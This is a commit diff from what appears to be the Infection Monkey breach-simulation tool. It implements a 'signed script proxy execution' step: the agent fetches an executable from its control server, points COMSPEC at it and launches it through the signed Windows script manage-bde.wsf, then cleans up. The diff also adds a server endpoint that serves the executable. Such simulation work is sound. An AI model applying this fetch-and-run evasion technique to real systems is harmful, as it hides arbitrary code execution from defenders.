Download exe from the island successfully, delete during pba cleanup

2020-08-20 01:24:47 +05:30 · 2020-08-20 01:24:47 +05:30 · ba8a7797e6
parent 79eeaa7904
commit ba8a7797e6
3 changed files with 22 additions and 15 deletions
--- a/monkey/infection_monkey/post_breach/signed_script_proxy/signed_script_proxy.py
+++ b/monkey/infection_monkey/post_breach/signed_script_proxy/signed_script_proxy.py
@ -1,6 +1,7 @@
 import subprocess

 from infection_monkey.post_breach.signed_script_proxy.windows.signed_script_proxy import (
+    get_windows_commands_to_delete_temp_comspec,
    get_windows_commands_to_proxy_execution_using_signed_script,
    get_windows_commands_to_reset_comspec)
 from infection_monkey.utils.environment import is_windows_os
@ -14,3 +15,4 @@ def get_commands_to_proxy_execution_using_signed_script():
 def cleanup_changes(original_comspec):
    if is_windows_os():
        subprocess.run(get_windows_commands_to_reset_comspec(original_comspec), shell=True)  # noqa: DUO116
+        subprocess.run(get_windows_commands_to_delete_temp_comspec, shell=True)  # noqa: DUO116
--- a/monkey/infection_monkey/post_breach/signed_script_proxy/windows/signed_script_proxy.py
+++ b/monkey/infection_monkey/post_breach/signed_script_proxy/windows/signed_script_proxy.py
@ -1,27 +1,29 @@
-import shutil
+import os
 import subprocess
-from pathlib import Path

 from infection_monkey.control import ControlClient

+TEMP_COMSPEC = os.path.join(os.getcwd(), 'random_executable.exe')
+

 def get_windows_commands_to_proxy_execution_using_signed_script():
-    # temp_comspec_path = ['infection_monkey', 'post_breach', 'signed_script_proxy', 'windows', 'random_executable.exe']
-    # temp_comspec = Path(*temp_comspec_path)
-    temp_comspec = "c:\\Users\\win\\desktop\\t1216.exe"
-    with ControlClient.get_T1216_pba_file() as r:
-        with open(temp_comspec, 'wb') as f:
-            shutil.copyfileobj(r.raw, f)
+    download = ControlClient.get_T1216_pba_file()
+    with open(TEMP_COMSPEC, 'wb') as file_obj:
+        file_obj.write(download.content)
+        file_obj.flush()

    windir_path = subprocess.check_output('echo %WINDIR%', shell=True).decode().strip('\r\n')  # noqa: DUO116
-    signed_script_path = [windir_path, 'System32', 'manage-bde.wsf']
-    signed_script = Path(*signed_script_path)
+    signed_script = os.path.join(windir_path, 'System32', 'manage-bde.wsf')

    return [
-        f'set comspec={temp_comspec} &&',
+        f'set comspec={TEMP_COMSPEC} &&',
        f'cscript {signed_script}'
    ]


 def get_windows_commands_to_reset_comspec(original_comspec):
    return f'set comspec={original_comspec}'
+
+
+def get_windows_commands_to_delete_temp_comspec():
+    return f'del {TEMP_COMSPEC} /f'
--- a/monkey/monkey_island/cc/resources/T1216_pba_file_download.py
+++ b/monkey/monkey_island/cc/resources/T1216_pba_file_download.py
@ -1,14 +1,17 @@
-from pathlib import Path
+import os

 import flask_restful
 from flask import send_from_directory

+from monkey_island.cc.consts import MONKEY_ISLAND_ABS_PATH
+

 class T1216PBAFileDownload(flask_restful.Resource):
    """
    File download endpoint used by monkey to download executable file for T1216 ("Signed Script Proxy Execution" PBA)
    """
+
    def get(self):
-        executable_file_path = ['monkey_island', 'cc', 'resources', 'pba', 'T1216_random_executable.exe']
-        executable_file = Path(*executable_file_path)
-        return send_from_directory(executable_file)
+        executable_file_name = 'T1216_random_executable.exe'
+        return send_from_directory(directory=os.path.join(MONKEY_ISLAND_ABS_PATH, 'cc', 'resources', 'pba'),
+                                   filename=executable_file_name)